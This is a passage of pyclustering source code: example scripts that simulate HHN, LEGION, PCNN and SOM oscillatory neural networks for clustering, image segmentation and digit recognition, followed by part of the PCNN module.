template_dynamic_hhn(10, 750, 100, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(10, 750, 100, stimulus, params, separate=True, ccore_flag=True)
def ten_oscillators_stimulated_sync():
params = hhn_parameters()
params.w1 = 0.1
params.w2 = 0.0
params.w3 = 0
stimulus = [25, 25, 25, 25, 25, 27, 27, 27, 27, 27]
template_dynamic_hhn(10, 750, 100, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(10, 750, 100, stimulus, params, separate=True, ccore_flag=True)
def ten_oscillators_stimulated_partial_sync():
params = hhn_parameters()
params.w1 = 0.1
params.w2 = 5.0
params.w3 = 0
stimulus = [25, 25, 25, 25, 25, 11, 11, 11, 11, 11]
template_dynamic_hhn(10, 750, 200, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(10, 750, 200, stimulus, params, separate=True, ccore_flag=True)
def six_oscillators_mix_2_stimulated():
params = hhn_parameters()
params.deltah = 400
stimulus = [25, 25, 25, 47, 47, 47]
template_dynamic_hhn(6, 1200, 600, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(6, 2400, 600, stimulus, params, separate=True, ccore_flag=True)
def six_oscillators_mix_3_stimulated():
params = hhn_parameters()
params.deltah = 400
stimulus = [0, 0, 25, 25, 47, 47]
template_dynamic_hhn(6, 1200, 600, stimulus, params, separate=True, ccore_flag=False)
template_dynamic_hhn(6, 2400, 600, stimulus, params, separate=True, ccore_flag=True)
def three_sync_ensembles():
params = hhn_parameters()
params.deltah = 400
stimulus = [25, 26, 25, 25, 26, 45, 46, 45, 44, 45, 65, 65, 65, 64, 66]
separate = [[0, 1, 2, 3, 4], [5, 6, 7, 8, 9], [10, 11, 12, 13, 14]]
num_osc = len(stimulus)
template_dynamic_hhn(num_osc, 2400, 600, stimulus, params, separate=separate, ccore_flag=True)
def four_ensembles_80_oscillators():
params = hhn_parameters()
params.deltah = 650
params.w1 = 0.1
params.w2 = 9.0
params.w3 = 5.0
params.threshold = -10
expected_ensembles = []
stimulus = []
base_stimulus = 10
step_stimulus = 10
    amount_ensembles = 4
    region_size = 20
    for i in range(amount_ensembles):
        expected_ensembles += [ [osc for osc in range(region_size * i, region_size * i + region_size)] ]
        stimulus += [ base_stimulus + step_stimulus * i ] * region_size
template_dynamic_hhn(len(stimulus), 4000, 1000, stimulus, params, separate=expected_ensembles, ccore_flag=True)
one_oscillator_unstimulated()
one_oscillator_stimulated()
three_oscillators_stimulated()
two_sync_ensembles()
ten_oscillators_stimulated_desync()
ten_oscillators_stimulated_sync()
ten_oscillators_stimulated_partial_sync()
six_oscillators_mix_2_stimulated()
six_oscillators_mix_3_stimulated()
three_sync_ensembles()
four_ensembles_80_oscillators()
```
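Each example above follows the same pattern: construct `hhn_network`, run `simulate`, then plot. A minimal sketch of that flow with the visualization stripped out (the stimulus value `25` is taken from the examples; printing the sizes is illustrative only):
```python
from pyclustering.nnet.hhn import hhn_network

# Two stimulated Hodgkin-Huxley oscillators, pure Python implementation.
net = hhn_network(2, [25, 25], ccore=False)

# 750 integration steps over 100 time units, as in the examples above.
(t, dyn_peripheral, dyn_central) = net.simulate(750, 100)

# dyn_peripheral[k] holds the membrane potentials of all peripheral
# oscillators at sampling time t[k].
print(len(t), len(dyn_peripheral[0]), len(dyn_central[0]))
```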
#### File: nnet/examples/legion_examples.py
```python
from pyclustering.utils import draw_dynamics;
from pyclustering.nnet.legion import legion_network, legion_parameters;
from pyclustering.nnet import *;
def template_dynamic_legion(num_osc, steps, time, conn_type, stimulus, params = None, separate_repr = True, ccore_flag = True):
net = legion_network(num_osc, params, conn_type, ccore = ccore_flag);
print("Created");
dynamic = net.simulate(steps, time, stimulus, solution = solve_type.RK4);
print("Simulated");
draw_dynamics(dynamic.time, dynamic.output, x_title = "Time", y_title = "x(t)", separate = separate_repr);
draw_dynamics(dynamic.time, dynamic.inhibitor, x_title = "Time", y_title = "z(t)");
ensembles = dynamic.allocate_sync_ensembles(0.1);
print(ensembles);
def one_oscillator_unstimulated():
parameters = legion_parameters();
parameters.teta = 0; # because no neighbors at all
template_dynamic_legion(1, 2000, 500, conn_type.NONE, [0], parameters);
def one_oscillator_stimulated():
parameters = legion_parameters();
parameters.teta = 0; # because no neighbors at all
template_dynamic_legion(1, 2000, 500, conn_type.NONE, [1], parameters);
def three_oscillator_unstimulated_list():
parameters = legion_parameters();
    parameters.teta = 0; # because no stimulated neighbors
template_dynamic_legion(3, 2000, 200, conn_type.LIST_BIDIR, [0, 0, 0], parameters);
def three_oscillator_stimulated_list():
template_dynamic_legion(3, 1500, 1500, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 1, 1]);
def three_oscillator_mix_stimulated_list():
parameters = legion_parameters();
parameters.Wt = 4.0;
template_dynamic_legion(3, 1200, 1200, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 0, 1], params = parameters);
def ten_oscillator_stimulated_list():
template_dynamic_legion(10, 1000, 750, conn_type = conn_type.LIST_BIDIR, stimulus = [1] * 10);
def ten_oscillator_mix_stimulated_list():
template_dynamic_legion(10, 1500, 1500, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 1, 1, 0, 0, 0, 1, 1, 0, 0], separate_repr = [ [0, 1, 2], [3, 4, 5, 8, 9], [6, 7] ]);
def thirteen_oscillator_three_stimulated_ensembles_list():
"Good example of three synchronous ensembels"
"Not accurate due to false skipes are observed"
parameters = legion_parameters();
parameters.Wt = 4.0;
parameters.fi = 10.0;
template_dynamic_legion(15, 1000, 1000, conn_type = conn_type.LIST_BIDIR, stimulus = [1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1], params = parameters, separate_repr = [ [0, 1, 2], [3, 4, 5, 9, 10], [6, 7, 8], [11, 12, 13, 14] ]);
def thirteen_simplify_oscillator_three_stimulated_ensembles_list():
"Good example of three synchronous ensembels"
"Not accurate due to false skipes are observed"
parameters = legion_parameters();
parameters.Wt = 4.0;
parameters.fi = 0.8;
parameters.ENABLE_POTENTIONAL = False;
template_dynamic_legion(15, 1000, 1000, conn_type = conn_type.LIST_BIDIR,
stimulus = [1, 1, 1, 0, 0, 0, 1, 1, 1, 0, 0, 1, 1, 1, 1],
params = parameters,
separate_repr = [ [0, 1, 2], [3, 4, 5, 9, 10], [6, 7, 8], [11, 12, 13, 14] ]);
def sixteen_oscillator_two_stimulated_ensembles_grid():
"Not accurate false due to spikes are observed"
parameters = legion_parameters();
parameters.teta_x = -1.1;
template_dynamic_legion(16, 2000, 1500, conn_type = conn_type.GRID_FOUR, params = parameters, stimulus = [1, 1, 1, 0,
1, 1, 1, 0,
0, 0, 0, 1,
0, 0, 1, 1]);
def simple_segmentation_example():
"Perfect results!"
parameters = legion_parameters();
parameters.eps = 0.02;
parameters.alpha = 0.005;
parameters.betta = 0.1;
parameters.gamma = 7.0;
parameters.teta = 0.9;
parameters.lamda = 0.1;
parameters.teta_x = -0.5;
parameters.teta_p = 7.0;
parameters.Wz = 0.7;
parameters.mu = 0.01;
parameters.fi = 3.0;
parameters.teta_xz = 0.1;
parameters.teta_zx = 0.1;
parameters.ENABLE_POTENTIONAL = False;
template_dynamic_legion(81, 2500, 2500,
conn_type = conn_type.GRID_FOUR,
params = parameters,
stimulus = [1, 1, 1, 0, 0, 0, 0, 0, 0,
1, 1, 1, 0, 0, 1, 1, 1, 1,
1, 1, 1, 0, 0, 1, 1, 1, 1,
0, 0, 0, 0, 0, 0, 1, 1, 1,
0, 0, 0, 0, 0, 0, 1, 1, 1,
1, 1, 1, 1, 0, 0, 1, 1, 1,
1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 0, 0, 0, 0, 0,
1, 1, 1, 1, 0, 0, 0, 0, 0],
separate_repr = [ [0, 1, 2, 9, 10, 11, 18, 19, 20],
[14, 15, 16, 17, 23, 24, 25, 26, 33, 34, 35, 42, 43, 44, 51, 52, 53],
[45, 46, 47, 48, 54, 55, 56, 57, 63, 64, 65, 66, 72, 73, 74, 75] ]);
one_oscillator_unstimulated();
one_oscillator_stimulated();
three_oscillator_unstimulated_list();
three_oscillator_stimulated_list();
three_oscillator_mix_stimulated_list();
ten_oscillator_stimulated_list();
ten_oscillator_mix_stimulated_list();
thirteen_oscillator_three_stimulated_ensembles_list();
thirteen_simplify_oscillator_three_stimulated_ensembles_list();
sixteen_oscillator_two_stimulated_ensembles_grid();
simple_segmentation_example();
```
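All the wrappers above funnel through `template_dynamic_legion`; a minimal sketch of the same calls without the drawing code (the stimulus pattern and the ensemble threshold `0.1` mirror the examples above; the keyword names follow the signatures shown in this file):
```python
from pyclustering.nnet.legion import legion_network
from pyclustering.nnet import conn_type, solve_type

# Three oscillators in a bidirectional list where only the outer two are stimulated.
net = legion_network(3, type_conn=conn_type.LIST_BIDIR, ccore=True)
dynamic = net.simulate(1000, 750, [1, 0, 1], solution=solve_type.RK4)

# Oscillators that fire in step are grouped into synchronous ensembles;
# stimulated and unstimulated oscillators should land in different groups.
print(dynamic.allocate_sync_ensembles(0.1))
```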
#### File: nnet/examples/pcnn_segmentation.py
```python
from PIL import Image
from pyclustering.utils import read_image, rgb2gray, draw_image_mask_segments
from pyclustering.nnet.pcnn import pcnn_network, pcnn_parameters, pcnn_visualizer
from pyclustering.nnet import *
from pyclustering.samples.definitions import IMAGE_SIMPLE_SAMPLES, IMAGE_MAP_SAMPLES, IMAGE_REAL_SAMPLES
def template_segmentation_image(image, parameters, simulation_time, brightness, scale_color=True, fastlinking=False,
show_spikes=False, ccore_flag=True):
image_source = Image.open(image)
image_size = image_source.size
width = image_size[0]
height = image_size[1]
stimulus = read_image(image)
stimulus = rgb2gray(stimulus)
if brightness is not None:
for pixel_index in range(len(stimulus)):
if stimulus[pixel_index] < brightness:
stimulus[pixel_index] = 1
else:
stimulus[pixel_index] = 0
else:
maximum_stimulus = float(max(stimulus))
minimum_stimulus = float(min(stimulus))
delta = maximum_stimulus - minimum_stimulus
for pixel_index in range(len(stimulus)):
if scale_color is True:
stimulus[pixel_index] = 1.0 - ((float(stimulus[pixel_index]) - minimum_stimulus) / delta)
else:
stimulus[pixel_index] = float(stimulus[pixel_index]) / 255
if parameters is None:
parameters = pcnn_parameters()
parameters.AF = 0.1
parameters.AL = 0.1
parameters.AT = 0.8
parameters.VF = 1.0
parameters.VL = 1.0
parameters.VT = 30.0
parameters.W = 1.0
parameters.M = 1.0
parameters.FAST_LINKING = fastlinking
net = pcnn_network(len(stimulus), parameters, conn_type.GRID_EIGHT, height=height, width=width, ccore=ccore_flag)
output_dynamic = net.simulate(simulation_time, stimulus)
pcnn_visualizer.show_output_dynamic(output_dynamic)
ensembles = output_dynamic.allocate_sync_ensembles()
draw_image_mask_segments(image, ensembles)
pcnn_visualizer.show_time_signal(output_dynamic)
if show_spikes is True:
spikes = output_dynamic.allocate_spike_ensembles()
draw_image_mask_segments(image, spikes)
pcnn_visualizer.animate_spike_ensembles(output_dynamic, image_size)
def segmentation_image_simple1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE01, None, 47, 235)
def segmentation_image_simple2():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE02, None, 47, 235)
def segmentation_image_simple6():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE06, None, 47, 128)
def segmentation_image_black_thin_lines1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_THIN_BLACK_LINES01, None, 47, 128)
def segmentation_image_black_thin_lines2():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_THIN_BLACK_LINES02, None, 47, 128)
def segmentation_image_black_thin_lines3():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_THIN_BLACK_LINES03, None, 47, 128)
def segmentation_gray_image_simple1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE01, None, 47, None, True, False, True)
def segmentation_gray_image_simple5():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE05, None, 47, None, True, False, True)
def segmentation_gray_image_beach():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BEACH, None, 94, None, True, False, True)
def segmentation_gray_image_building():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BUILDING, None, 47, None, True, False, True)
def segmentation_fast_linking_image_beach():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BEACH, None, 47, None, False, True, True)
def segmentation_fast_linking_image_building():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BUILDING, None, 47, None, False, True, True)
def segmentation_fast_linking_image_fruits():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_FRUITS_SMALL, None, 47, None, False, True, True)
def segmentation_fast_linking_white_sea():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_WHITE_SEA_SMALL, None, 47, None, False, True, True)
def segmentation_fast_linking_nile():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_NILE_SMALL, None, 47, None, False, True, True)
def segmentation_fast_linking_field_flowers():
parameters = pcnn_parameters()
parameters.AF = 0.1
parameters.AL = 0.1
parameters.AT = 0.8
parameters.VF = 1.0
parameters.VL = 1.0
parameters.VT = 80.0
parameters.W = 1.0
parameters.M = 1.0
parameters.FAST_LINKING = True
template_segmentation_image(IMAGE_REAL_SAMPLES.IMAGE_FIELD_FLOWER, parameters, 80, None, False, True, True)
# Examples of simple image segmentation
segmentation_image_simple1()
segmentation_image_simple2()
segmentation_image_simple6()
# Line allocation
segmentation_image_black_thin_lines1()
segmentation_image_black_thin_lines2()
segmentation_image_black_thin_lines3()
# More complex image segmentation examples
segmentation_gray_image_simple1()
segmentation_gray_image_simple5()
segmentation_gray_image_beach()
segmentation_gray_image_building()
# Fast linking usage examples
segmentation_fast_linking_image_beach()
segmentation_fast_linking_image_building()
segmentation_fast_linking_image_fruits()
segmentation_fast_linking_white_sea()
segmentation_fast_linking_nile()
segmentation_fast_linking_field_flowers()
```
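The brightness branch of `template_segmentation_image` reduces the image to a binary stimulus before simulation. A condensed sketch of that path without the visualization calls (the sample, the threshold `235`, and the `47` simulation steps are taken from `segmentation_image_simple1` above):
```python
from PIL import Image
from pyclustering.nnet.pcnn import pcnn_network
from pyclustering.nnet import conn_type
from pyclustering.utils import read_image, rgb2gray
from pyclustering.samples.definitions import IMAGE_SIMPLE_SAMPLES

image = IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE01
width, height = Image.open(image).size

# Dark pixels become 1 (stimulated), bright pixels 0, exactly as in the template.
stimulus = [1 if pixel < 235 else 0 for pixel in rgb2gray(read_image(image))]

net = pcnn_network(len(stimulus), None, conn_type.GRID_EIGHT, height=height, width=width, ccore=True)
output_dynamic = net.simulate(47, stimulus)

# Each synchronous ensemble is one image segment (a list of pixel indexes).
print(len(output_dynamic.allocate_sync_ensembles()))
```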
#### File: nnet/examples/som_recognition.py
```python
from pyclustering.nnet.som import som, type_conn;
from pyclustering.samples.definitions import IMAGE_DIGIT_SAMPLES;
from pyclustering.utils import read_image, rgb2gray;
from tkinter import *;
from tkinter import messagebox;
import math;
import pickle;
import os;
import random;
class recognizer:
__network = None;
def __init__(self):
self.__decode_map = [];
for index_digit in range(0, 10, 1):
list_file_digit_sample = IMAGE_DIGIT_SAMPLES.GET_LIST_IMAGE_SAMPLES(index_digit);
for file_name in list_file_digit_sample:
self.__decode_map.append(index_digit);
def train(self):
samples = [];
print("Digit images preprocessing...");
for index_digit in range(0, 10, 1):
list_file_digit_sample = IMAGE_DIGIT_SAMPLES.GET_LIST_IMAGE_SAMPLES(index_digit);
for file_name in list_file_digit_sample:
data = read_image(file_name);
image_pattern = rgb2gray(data);
for index_pixel in range(len(image_pattern)):
if (image_pattern[index_pixel] < 128):
image_pattern[index_pixel] = 1;
else:
image_pattern[index_pixel] = 0;
samples += [ image_pattern ];
print("SOM initialization...");
self.__network = som(2, 5, type_conn.grid_four, None, True);
print("SOM training...");
self.__network.train(samples, 300);
print("SOM is ready...");
def recognize(self, input_pattern):
index_neuron = self.__network.simulate(input_pattern);
decoded_capture_objects = [];
for index_capture_object in self.__network.capture_objects[index_neuron]:
# print("\t%s" % decode_map[index_capture_object]);
decoded_capture_objects.append(self.__decode_map[index_capture_object]);
frequent_index = max(set(decoded_capture_objects), key = decoded_capture_objects.count);
print(decoded_capture_objects);
return frequent_index;
def save_knowledge(self):
result_saving = False;
if (self.__network is not None):
file_network_dump = open("knowledge_recognition_memory_dump", "wb");
pickle.dump(self.__network, file_network_dump);
result_saving = True;
return result_saving;
def load_knowledge(self):
result_loading = False;
if (os.path.isfile("knowledge_recognition_memory_dump") is True):
file_network_dump = open("knowledge_recognition_memory_dump", "rb");
self.__network = pickle.load(file_network_dump);
result_loading = True;
return result_loading;
class digit_application:
__color = "#000000";
__widget = None;
__user_pattern = None;
__recognizer = None;
__master = None;
def __init__(self):
self.__master = Tk();
self.__master.title("Recognition");
self.__widget = Canvas(self.__master, width = 320, height = 320);
self.__widget.pack(expand = YES, fill = BOTH);
self.__widget.bind("<B1-Motion>", self.__paint);
button_recognize = Button(self.__master, text = "Recognize", command = self.click_recognize, width = 25);
button_recognize.pack(side = BOTTOM);
button_recognize = Button(self.__master, text = "Random Image", command = self.click_image_load, width = 25);
button_recognize.pack(side = BOTTOM);
# button_save = Button(self.__master, text = "Save", command = self.click_save, width = 25);
# button_save.pack(side = BOTTOM);
#
# button_load = Button(self.__master, text = "Load", command = self.click_load, width = 25);
# button_load.pack(side = BOTTOM);
button_train = Button(self.__master, text = "Train", command = self.click_train, width = 25);
button_train.pack(side = BOTTOM);
button_clean = Button(self.__master, text = "Clean", command = self.click_clean, width = 25);
button_clean.pack(side = BOTTOM);
self.__user_pattern = [ 0 for i in range(32 * 32) ];
self.__recognizer = recognizer();
def __paint(self, event):
        # calculate the square that this click belongs to
if ( (event.x >= 0) and (event.x < 320) and (event.y >= 0) and (event.y < 320) ):
x1, y1 = math.floor(event.x / 10), math.floor(event.y / 10);
self.__user_pattern[y1 * 32 + x1] = 1;
index2 = (y1 + 1) * 32 + x1;
index3 = y1 * 32 + (x1 + 1);
index4 = (y1 + 1) * 32 + (x1 + 1);
if (index2 < len(self.__user_pattern)):
self.__user_pattern[index2] = 1;
if (index3 < len(self.__user_pattern)):
self.__user_pattern[index3] = 1;
if (index4 < len(self.__user_pattern)):
self.__user_pattern[index4] = 1;
display_x1, display_y1 = x1 * 10, y1 * 10;
display_x2, display_y2 = display_x1 + 20, display_y1 + 20;
self.__widget.create_rectangle(display_x1, display_y1, display_x2, display_y2, fill = self.__color, width = 0);
def click_train(self):
self.__recognizer.train();
def click_load(self):
if (self.__recognizer.load_knowledge() is not True):
messagebox.showwarning("Recognition - Knowledge Loading", "Knowledge represented by self-organized feature map has not been "
"load from hardware to recognizer due to lack of saved dump of that object. "
"Please save knowledge dump after training and after that it will be possible "
"to use load it at any time.");
def click_save(self):
if (self.__recognizer.save_knowledge() is not True):
messagebox.showwarning("Recognition - Knowledge Saving", "Knowledge represented by self-organized feature map has been created "
"because training has been performed. Please train recognizer and after save result of training.");
def click_recognize(self):
digit_index = self.__recognizer.recognize(self.__user_pattern);
messagebox.showinfo("Recognition - Result", "Most probably input digit is " + str(digit_index));
def click_clean(self):
self.__user_pattern = [ 0 for i in range(32 * 32) ];
Canvas.delete(self.__widget, "all");
def click_image_load(self):
self.__user_pattern = [ 0 for i in range(32 * 32) ];
Canvas.delete(self.__widget, "all");
index_digit = int(math.floor(random.random() * 10));
list_file_digit_sample = IMAGE_DIGIT_SAMPLES.GET_LIST_IMAGE_SAMPLES(index_digit);
index_image = int(math.floor( random.random() * len(list_file_digit_sample) ));
file_name = list_file_digit_sample[index_image];
data = read_image(file_name);
image_pattern = rgb2gray(data);
for y in range(32):
for x in range(32):
linear_index = y * 32 + x;
if (image_pattern[linear_index] < 128):
self.__user_pattern[linear_index] = 1;
self.__widget.create_rectangle(x * 10, y * 10, x * 10 + 10, y * 10 + 10, fill = self.__color, width = 0);
def start(self):
mainloop();
app = digit_application();
app.start();
# digit_recognition();
```
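`save_knowledge` and `load_knowledge` above persist the trained map with `pickle`, which works because `som` implements `__getstate__`/`__setstate__` (shown in `pyclustering/nnet/som.py` later in this document). A minimal sketch of the same round trip on toy data (the 2x2 map, the toy points, and the file name are illustrative):
```python
import pickle
from pyclustering.nnet.som import som, type_conn

# Train a tiny 2x2 map on four 2-D points.
network = som(2, 2, type_conn.grid_four, None, True)
network.train([[0.1, 0.2], [0.8, 0.9], [0.15, 0.25], [0.85, 0.95]], 100)

# Persist the trained map, then restore it in place of retraining.
with open("som_dump.pickle", "wb") as dump_file:
    pickle.dump(network, dump_file)
with open("som_dump.pickle", "rb") as dump_file:
    restored = pickle.load(dump_file)

# The restored map answers queries without any retraining.
print(restored.simulate([0.12, 0.22]))
```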
#### File: nnet/examples/syncsegm_examples.py
```python
from pyclustering.samples.definitions import IMAGE_SIMPLE_SAMPLES, IMAGE_MAP_SAMPLES
from pyclustering.nnet.syncsegm import syncsegm, syncsegm_visualizer
from pyclustering.utils import draw_image_mask_segments
def template_segmentation_image(source, color_radius, object_radius, noise_size, show_dyn):
algorithm = syncsegm(color_radius, object_radius, noise_size, False)
analyser = algorithm.process(source, show_dyn)
color_segments = analyser.allocate_colors(0.01, noise_size)
draw_image_mask_segments(source, color_segments)
if object_radius is not None:
object_segments = analyser.allocate_objects(0.01, noise_size)
draw_image_mask_segments(source, object_segments)
if show_dyn is True:
syncsegm_visualizer.show_first_layer_dynamic(analyser)
syncsegm_visualizer.show_second_layer_dynamic(analyser)
def segmentation_image_simple1():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE01, 128, None, 10, show_dyn = False)
def segmentation_image_simple2():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE02, 128, None, 10, show_dyn = False)
def segmentation_image_simple3():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE03, 128, None, 10, show_dyn = False)
def segmentation_image_simple4():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE04, 128, None, 10, show_dyn = False)
def segmentation_image_simple5():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE05, 128, 4, 10, show_dyn = False)
def segmentation_image_simple6():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE06, 128, 4, 10, show_dyn = True)
def segmentation_image_simple7():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE07, 128, 5, 10, show_dyn = False)
def segmentation_image_simple8():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE08, 128, 5, 10, show_dyn = False)
def segmentation_image_simple9():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE09, 128, 4, 10, show_dyn = False)
def segmentation_image_simple10():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE10, 128, 5, 10, show_dyn = False)
def segmentation_image_beach():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BEACH, 128, None, 10, show_dyn = False)
def segmentation_image_building():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_BUILDING, 16, 10, 10, show_dyn = False)
def segmentation_image_fruits_small():
template_segmentation_image(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE_FRUITS_SMALL, 16, 4, 20, show_dyn = False)
def segmentation_image_white_sea():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_WHITE_SEA, 16, None, 50, show_dyn = False)
def segmentation_image_white_sea_small():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_WHITE_SEA_SMALL, 20, None, 50, show_dyn = False)
def segmentation_image_nile():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_NILE, 16, None, 50, show_dyn = False)
def segmentation_image_nile_small():
template_segmentation_image(IMAGE_MAP_SAMPLES.IMAGE_NILE_SMALL, 50, None, 50, show_dyn = False)
segmentation_image_simple1()
segmentation_image_simple2()
segmentation_image_simple3()
segmentation_image_simple4()
segmentation_image_simple5()
segmentation_image_simple6()
segmentation_image_simple7()
segmentation_image_simple8()
segmentation_image_simple9()
segmentation_image_simple10()
segmentation_image_beach()
segmentation_image_building()
segmentation_image_fruits_small()
segmentation_image_white_sea()
segmentation_image_white_sea_small()
segmentation_image_nile()
segmentation_image_nile_small()
```
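All the wrappers above delegate to the same three calls; a minimal sketch without visualization (the sample, radii, and noise size are taken from `segmentation_image_simple5` above):
```python
from pyclustering.nnet.syncsegm import syncsegm
from pyclustering.samples.definitions import IMAGE_SIMPLE_SAMPLES

# First layer groups pixels by color (radius 128); second layer splits each
# color group into spatially connected objects (radius 4); segments smaller
# than 10 pixels are treated as noise.
algorithm = syncsegm(128, 4, 10, False)
analyser = algorithm.process(IMAGE_SIMPLE_SAMPLES.IMAGE_SIMPLE05, False)

color_segments = analyser.allocate_colors(0.01, 10)
object_segments = analyser.allocate_objects(0.01, 10)
print(len(color_segments), len(object_segments))
```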
#### File: pyclustering/nnet/pcnn.py
```python
import math
import random
import numpy
import matplotlib.pyplot as plt
import matplotlib.animation as animation
from PIL import Image
from pyclustering.nnet import *
from pyclustering.core.wrapper import ccore_library
import pyclustering.core.pcnn_wrapper as wrapper
from pyclustering.utils import draw_dynamics
class pcnn_parameters:
"""!
@brief Parameters for pulse coupled neural network.
"""
def __init__(self):
"""!
@brief Default constructor of parameters for pulse-coupled neural network.
@details Constructor initializes parameters by default non-zero values that can be
used for simple simulation.
"""
## Multiplier for the feeding compartment at the current step.
self.VF = 1.0
## Multiplier for the linking compartment at the current step.
self.VL = 1.0
## Multiplier for the threshold at the current step.
self.VT = 10.0
## Multiplier for the feeding compartment at the previous step.
self.AF = 0.1
## Multiplier for the linking compartment at the previous step.
self.AL = 0.1
## Multiplier for the threshold at the previous step.
self.AT = 0.5
## Synaptic weight - neighbours influence on linking compartment.
self.W = 1.0
## Synaptic weight - neighbours influence on feeding compartment.
self.M = 1.0
## Linking strength in the network.
self.B = 0.1
## Enable/disable Fast-Linking mode. Fast linking helps to overcome some of the effects of time quantisation. This process allows the linking wave to progress a lot faster than the feeding wave.
self.FAST_LINKING = False
class pcnn_dynamic:
"""!
@brief Represents output dynamic of PCNN (pulse-coupled neural network).
"""
@property
def output(self):
"""!
        @brief (list) Returns oscillator outputs during simulation.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_get_output(self.__ccore_pcnn_dynamic_pointer)
return self.__dynamic
@property
def time(self):
"""!
@brief (list) Returns sampling times when dynamic is measured during simulation.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_get_time(self.__ccore_pcnn_dynamic_pointer)
return list(range(len(self)))
def __init__(self, dynamic, ccore=None):
"""!
@brief Constructor of PCNN dynamic.
        @param[in] dynamic (list): Dynamic of oscillators on each step of simulation. If the ccore pointer is specified then it can be ignored.
@param[in] ccore (ctypes.pointer): Pointer to CCORE pcnn_dynamic instance in memory.
"""
self.__OUTPUT_TRUE = 1 # fire value for oscillators.
self.__OUTPUT_FALSE = 0 # rest value for oscillators.
self.__dynamic = dynamic
self.__ccore_pcnn_dynamic_pointer = ccore
def __del__(self):
"""!
@brief Default destructor of PCNN dynamic.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
wrapper.pcnn_dynamic_destroy(self.__ccore_pcnn_dynamic_pointer)
def __len__(self):
"""!
@brief (uint) Returns number of simulation steps that are stored in dynamic.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_get_size(self.__ccore_pcnn_dynamic_pointer)
return len(self.__dynamic)
def allocate_sync_ensembles(self):
"""!
@brief Allocate clusters in line with ensembles of synchronous oscillators where each
synchronous ensemble corresponds to only one cluster.
        @return (list) Groups (lists) of indexes of synchronous oscillators.
For example, [ [index_osc1, index_osc3], [index_osc2], [index_osc4, index_osc5] ].
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_allocate_sync_ensembles(self.__ccore_pcnn_dynamic_pointer)
sync_ensembles = []
traverse_oscillators = set()
number_oscillators = len(self.__dynamic[0])
for t in range(len(self.__dynamic) - 1, 0, -1):
sync_ensemble = []
for i in range(number_oscillators):
if self.__dynamic[t][i] == self.__OUTPUT_TRUE:
if i not in traverse_oscillators:
sync_ensemble.append(i)
traverse_oscillators.add(i)
if sync_ensemble != []:
sync_ensembles.append(sync_ensemble)
return sync_ensembles
def allocate_spike_ensembles(self):
"""!
@brief Analyses output dynamic of network and allocates spikes on each iteration as a list of indexes of oscillators.
@details Each allocated spike ensemble represents list of indexes of oscillators whose output is active.
@return (list) Spike ensembles of oscillators.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_allocate_spike_ensembles(self.__ccore_pcnn_dynamic_pointer)
spike_ensembles = []
number_oscillators = len(self.__dynamic[0])
for t in range(len(self.__dynamic)):
spike_ensemble = []
for index in range(number_oscillators):
if self.__dynamic[t][index] == self.__OUTPUT_TRUE:
spike_ensemble.append(index)
if len(spike_ensemble) > 0:
spike_ensembles.append(spike_ensemble)
return spike_ensembles
def allocate_time_signal(self):
"""!
@brief Analyses output dynamic and calculates time signal (signal vector information) of network output.
@return (list) Time signal of network output.
"""
if self.__ccore_pcnn_dynamic_pointer is not None:
return wrapper.pcnn_dynamic_allocate_time_signal(self.__ccore_pcnn_dynamic_pointer)
